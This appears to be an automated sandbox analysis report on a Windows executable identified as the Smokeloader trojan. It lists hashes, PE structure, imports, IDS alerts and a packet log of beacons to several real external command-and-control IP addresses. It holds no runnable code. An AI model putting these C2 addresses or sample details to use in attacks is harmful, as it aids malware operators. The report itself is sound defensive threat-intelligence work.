                                                          SSDEEP:12288:8zehz7flyOy9EQZe6Zohw87Me/YlaJWD1KkVFe8tXTMENi+7:8UzByOyPZDZofge/hS1NVF3xTtN
                                                          MD5:B2FDE4A8B7D6AA7E0FA7F853899F1C4F
                                                          SHA1:17349645171D6D99D95B597E462513BDDEED1D4C
                                                          SHA-256:80F748BCBC373132E361C85DEF9887BAE38EA8F9B72B06539D24321BE8111D93
                                                          SHA-512:9653CEE1F673D4CA726C0790470260EE4EEBAD108A47F455844FAAC56880E98BE06901E3CB5E762CCFEE6DBD51BBC3762E7BB691D18856086212028C2A524B07
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........=.snn.snn.snn.!.n.snn.!.n.snn.!.n.snn..n.snn.son.snn.!.n.snn.!.n.snn.!.n.snnRich.snn........................PE..L...f.Ob..................... .......?............@..........................@......2s......................................t...<.......0k................... .......................................%..@...............d............................text............................... ..`.data...|........l..................@....rsrc...0k.......l...j..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):341504
                                                          Entropy (8bit):6.638746109906065
                                                          Encrypted:false
                                                          SSDEEP:6144:IdLLsrs6dNPpKqibWQFvVquxsV5p5KjAWTM4xVvkHb+ewB:ILgrs6daqo33jxsV5KXTMENi+7
                                                          MD5:D0BF82E7840B3179B85D665A3AE895A5
                                                          SHA1:F97D45F0DF4B91FA8756AF2A4AC4B7BC28A79C14
                                                          SHA-256:40C8ADAEE430093BF55E59066013C9EF5959D617751930D1B77944C5BC769527
                                                          SHA-512:50FCE94219099B9B5A44FF912F935E5302F209ADD82E2FEFB94DD763D1A7DA373A3293F73431807ABC4BDF7A726ED467E2AAB26B4687F75E0E861A47EF9E3896
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........=.snn.snn.snn.!.n.snn.!.n.snn.!.n.snn..n.snn.son.snn.!.n.snn.!.n.snn.!.n.snnRich.snn........................PE..L....~.`.....................h.......?............@..................................q......................................t...<.......0k...................p.......................................%..@...............d............................text............................... ..`.data...............................@....rsrc...0k.......l..................@..@.reloc.......p....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.638746109906065
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:file.exe
                                                          File size:341504
                                                          MD5:d0bf82e7840b3179b85d665a3ae895a5
                                                          SHA1:f97d45f0df4b91fa8756af2a4ac4b7bc28a79c14
                                                          SHA256:40c8adaee430093bf55e59066013c9ef5959d617751930d1b77944c5bc769527
                                                          SHA512:50fce94219099b9b5a44ff912f935e5302f209add82e2fefb94dd763d1a7da373a3293f73431807abc4bdf7a726ed467e2aab26b4687f75e0e861a47ef9e3896
                                                          SSDEEP:6144:IdLLsrs6dNPpKqibWQFvVquxsV5p5KjAWTM4xVvkHb+ewB:ILgrs6daqo33jxsV5KXTMENi+7
                                                          TLSH:FA74AD306390E875FB1A05758825DAE06E69F8738F506AB37328771F9A70DF1823ED94
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........=.snn.snn.snn.!.n.snn.!.n.snn.!.n.snn...n.snn.son.snn.!.n.snn.!.n.snn.!.n.snnRich.snn........................PE..L....~.`...
                                                          Icon Hash:b4bc96b6b69486e2
                                                          Entrypoint:0x403ffe
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x60EB7E99 [Sun Jul 11 23:28:25 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:ac60a8dcc69324c92e3ea84189250edd
                                                          Instruction
                                                          call 00007F8DA8336FD2h
                                                          jmp 00007F8DA8333A1Eh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          call 00007F8DA8333BDCh
                                                          xchg cl, ch
                                                          jmp 00007F8DA8333BC4h
                                                          call 00007F8DA8333BD3h
                                                          fxch st(0), st(1)
                                                          jmp 00007F8DA8333BBBh
                                                          fabs
                                                          fld1
                                                          mov ch, cl
                                                          xor cl, cl
                                                          jmp 00007F8DA8333BB1h
                                                          mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                          fabs
                                                          fxch st(0), st(1)
                                                          fabs
                                                          fxch st(0), st(1)
                                                          fpatan
                                                          or cl, cl
                                                          je 00007F8DA8333BA6h
                                                          fldpi
                                                          fsubrp st(1), st(0)
                                                          or ch, ch
                                                          je 00007F8DA8333BA4h
                                                          fchs
                                                          ret
                                                          fabs
                                                          fld st(0), st(0)
                                                          fld st(0), st(0)
                                                          fld1
                                                          fsubrp st(1), st(0)
                                                          fxch st(0), st(1)
                                                          fld1
                                                          faddp st(1), st(0)
                                                          fmulp st(1), st(0)
                                                          ftst
                                                          wait
                                                          fstsw word ptr [ebp-000000A0h]
                                                          wait
                                                          test byte ptr [ebp-0000009Fh], 00000001h
                                                          jne 00007F8DA8333BA7h
                                                          xor ch, ch
                                                          fsqrt
                                                          ret
                                                          pop eax
                                                          jmp 00007F8DA83347BFh
                                                          fstp st(0)
                                                          fld tbyte ptr [004114BAh]
                                                          ret
                                                          fstp st(0)
                                                          or cl, cl
                                                          je 00007F8DA8333BADh
                                                          fstp st(0)
                                                          fldpi
                                                          or ch, ch
                                                          je 00007F8DA8333BA4h
                                                          fchs
                                                          ret
                                                          fstp st(0)
                                                          fldz
                                                          or ch, ch
                                                          je 00007F8DA8333B99h
                                                          fchs
                                                          ret
                                                          fstp st(0)
                                                          jmp 00007F8DA8334795h
                                                          fstp st(0)
                                                          mov cl, ch
                                                          jmp 00007F8DA8333BA2h
                                                          call 00007F8DA8333B6Eh
                                                          jmp 00007F8DA83347A0h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          add esp, 00000030h
                                                          Programming Language:
                                                          • [C++] VS2008 build 21022
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x101740x3c.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000x26b30.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x570000xaa4.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x11b00x1c.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x25c00x40.text
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x164.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000xf9920xfa00False0.574578125data6.773217121698693IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .data0x110000x1e4fc0x1b600False0.755921803652968data6.812614538183082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x300000x26b300x26c00False0.5955393145161291data5.90584051060312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x570000x14e00x1600False0.41370738636363635data4.078155334415673IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountry
                                                          RT_CURSOR0x54fc00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                          RT_CURSOR0x55e680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                          RT_CURSOR0x567380x130Device independent bitmap graphic, 32 x 64 x 1, image size 0SlovakSlovakia
                                                          RT_CURSOR0x568680xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0SlovakSlovakia
                                                          RT_ICON0x30b200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x319c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x322700x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x327d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x34d800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x35e280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x367b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x36c800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x37b280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x383d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x3a9780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x3ba200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x3bed80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x3cd800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x3d6280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x3db900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x401380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x411e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x41b680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x420380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x42ee00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x437880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x43e500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x443b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x469600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x47a080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x47ed80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSlovakSlovakia
                                                          RT_ICON0x48d800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSlovakSlovakia
                                                          RT_ICON0x496280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSlovakSlovakia
                                                          RT_ICON0x49cf00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSlovakSlovakia
                                                          RT_ICON0x4a2580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SlovakSlovakia
                                                          RT_ICON0x4c8000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SlovakSlovakia
                                                          RT_ICON0x4d8a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SlovakSlovakia
                                                          RT_ICON0x4e2300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SlovakSlovakia
                                                          RT_ICON0x4e7100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x4f5b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x4fe600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x505280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                          RT_ICON0x50a900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x530380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x540e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                                                          RT_ICON0x54a680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                          RT_ACCELERATOR0x54f480x78dataSlovakSlovakia
                                                          RT_GROUP_CURSOR0x567100x22dataSlovakSlovakia
                                                          RT_GROUP_CURSOR0x569180x22dataSlovakSlovakia
                                                          RT_GROUP_ICON0x36c180x68dataSlovakSlovakia
                                                          RT_GROUP_ICON0x3be880x4cdataSlovakSlovakia
                                                          RT_GROUP_ICON0x47e700x68dataSlovakSlovakia
                                                          RT_GROUP_ICON0x41fd00x68dataSlovakSlovakia
                                                          RT_GROUP_ICON0x4e6980x76dataSlovakSlovakia
                                                          RT_GROUP_ICON0x54ed00x76dataSlovakSlovakia
                                                          RT_VERSION0x569400x1f0MS Windows COFF PowerPC object fileSlovakSlovakia
                                                          DLLImport
                                                          KERNEL32.dllDebugActiveProcess, DeleteVolumeMountPointA, EndUpdateResourceW, ReadConsoleA, GetNumberOfConsoleMouseButtons, GetComputerNameW, SetThreadExecutionState, FreeEnvironmentStringsA, GetTickCount, TlsSetValue, LoadLibraryW, GetConsoleAliasW, WriteConsoleW, LCMapStringA, InterlockedExchange, SetLastError, GetProcAddress, VirtualAlloc, ResetEvent, LoadLibraryA, GetProcessWorkingSetSize, SetConsoleDisplayMode, LockResource, SetCommMask, GetModuleHandleA, OpenFileMappingW, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, GetLastError, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, MultiByteToWideChar, RtlUnwind, HeapSize, GetLocaleInfoA, WideCharToMultiByte, RaiseException, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, GetStringTypeA, GetStringTypeW, CloseHandle, WriteConsoleA, GetConsoleOutputCP, SetFilePointer, SetStdHandle, CreateFileA
                                                          USER32.dllWindowFromDC
                                                          Language of compilation systemCountry where language is spokenMap
                                                          SlovakSlovakia
                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          192.168.2.593.112.238.8549715802851815 01/03/23-09:46:55.877154TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184971580192.168.2.593.112.238.85
                                                          192.168.2.5175.120.254.949709802851815 01/03/23-09:46:28.845991TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970980192.168.2.5175.120.254.9
                                                          192.168.2.5195.158.3.16249708802851815 01/03/23-09:46:27.109616TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184970880192.168.2.5195.158.3.162
                                                          192.168.2.5175.120.254.949719802851815 01/03/23-09:46:58.922198TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184971980192.168.2.5175.120.254.9
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 3, 2023 09:46:26.986928940 CET4970880192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:27.109085083 CET8049708195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:27.109195948 CET4970880192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:27.109616041 CET4970880192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:27.109632015 CET4970880192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:27.232065916 CET8049708195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:27.672688007 CET8049708195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:27.673171043 CET8049708195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:27.673271894 CET4970880192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:27.733532906 CET4970880192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:27.857680082 CET8049708195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:28.542877913 CET4970980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:28.838428974 CET8049709175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:46:28.838675022 CET4970980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:28.845990896 CET4970980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:28.848963976 CET4970980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:29.144529104 CET8049709175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:46:30.059654951 CET8049709175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:46:30.059716940 CET8049709175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:46:30.059798002 CET4970980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:30.059798002 CET4970980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:30.209362030 CET4971080192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:30.355072975 CET8049709175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:46:30.476968050 CET804971058.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:30.477078915 CET4971080192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:30.477191925 CET4971080192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:30.477214098 CET4971080192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:30.744719028 CET804971058.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:31.671641111 CET804971058.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:31.671706915 CET804971058.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:31.671793938 CET4971080192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:31.671884060 CET4971080192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:31.686537027 CET4971180192.168.2.5181.215.246.89
                                                          Jan 3, 2023 09:46:31.939560890 CET804971058.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:34.878679037 CET4971180192.168.2.5181.215.246.89
                                                          Jan 3, 2023 09:46:40.879264116 CET4971180192.168.2.5181.215.246.89
                                                          Jan 3, 2023 09:46:52.918148994 CET4971380192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:46:53.177174091 CET8049713211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:46:53.177369118 CET4971380192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:46:53.185036898 CET4971380192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:46:53.185298920 CET4971380192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:46:53.444119930 CET8049713211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:46:54.494102955 CET8049713211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:46:54.494132042 CET8049713211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:46:54.494235992 CET4971380192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:46:54.497417927 CET4971380192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:46:54.543066025 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.543164968 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.543268919 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.544676065 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.544749975 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.622322083 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.622535944 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.625771046 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.625824928 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.626204014 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.645924091 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.645975113 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.684156895 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.684191942 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.684357882 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.684387922 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.712980032 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.713195086 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.713231087 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.715115070 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.715281010 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.715307951 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.715359926 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.715461969 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.715475082 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.741317034 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.741465092 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.741501093 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.742868900 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.743000031 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.743019104 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.743051052 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.743104935 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.744016886 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.744169950 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.744194031 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.744214058 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.744218111 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.744353056 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.744381905 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.744493961 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.744527102 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.744642973 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.744668007 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.744693041 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.744808912 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.744828939 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.756067038 CET8049713211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:46:54.770081997 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.770199060 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.770344973 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.770428896 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.770461082 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.772053957 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.772231102 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.772267103 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.772325993 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.772433996 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.772454023 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.773294926 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.773436069 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.773458958 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.773587942 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.773715019 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.773736000 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.773916006 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.774034977 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.774055004 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.774374008 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.774501085 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.774524927 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.774750948 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.774890900 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.774914980 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.775176048 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.775302887 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.775330067 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.775438070 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.775553942 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.775573969 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.799036026 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.799230099 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.799267054 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.799395084 CET443497145.135.247.111192.168.2.5
